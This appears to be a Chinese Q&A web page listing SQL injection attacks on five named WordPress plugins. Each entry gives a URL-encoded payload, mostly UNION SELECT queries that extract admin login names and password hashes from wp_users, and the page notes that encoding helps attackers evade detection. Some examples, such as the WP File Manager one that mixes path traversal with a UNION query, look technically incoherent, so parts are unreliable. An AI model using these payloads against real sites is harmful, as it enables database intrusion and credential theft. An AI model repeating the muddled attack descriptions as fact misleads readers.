首页 问答 正文

WordPress主题插件的SQL注入攻击有哪些?

注册会员 / 悠然自学 / 2023-06-11/ 浏览 124 次

常见的WordPress主题插件的SQL注入攻击包括:

  1. wp-db-backup插件的SQL注入攻击:攻击者可以通过将语句插入备份文件名中来执行任意SQL查询。示例代码:
http://website.com/wp-content/plugins/wp-db-backup/download.php?file=/path/to/backup/file.php%27%20AND%20%271%27=%271 
  1. wpshop eCommerce插件的SQL注入攻击:攻击者可以通过在订单ID参数中插入恶意代码来执行任意SQL查询。示例代码:
http://website.com/?wpshop_checkout=1&id=-1)%20UNION%20ALL%20SELECT%20concat(user_login,0x3a,user_pass),2,3%20FROM%20wp_users%20WHERE%20user_login=%27admin%27#fake 
  1. NextGEN Gallery插件的SQL注入攻击:攻击者可以通过在网址中插入任意SQL语句来执行任意查询。示例代码:
http://website.com/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=1+UNION+SELECT+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,10,11,12,13+FROM+wp_users+WHERE+ID=1 
  1. WP Statistics插件的SQL注入攻击:攻击者可以通过在访问统计页面的参数中插入恶意代码来执行任意SQL查询。示例代码:
http://website.com/wp-content/plugins/wp-statistics/stats_page.php?search=%25%27%20UNION%20ALL%20SELECT%20TABLE_NAME%20FROM%20information_schema.tables%20WHERE%20TABLE_SCHEMA=database()%20–- 
  1. WP File Manager插件的SQL注入攻击:攻击者可以通过在插件的文件上传功能中插入任意SQL语句来执行任意查询。示例代码:
http://website.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=get&target=l1_Lw%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%20UNION%20SELECT%20concat(user_login,0x3a,user_pass),2,3%20FROM%20wp_users%20WHERE%20user_login=%27admin%27 

需要注意的是,以上示例代码中的网址和参数都是经过URL编码的,攻击者通常会在提交注入代码前对其进行编码,使得代码更难被检测到。

大家谈论
    我的见解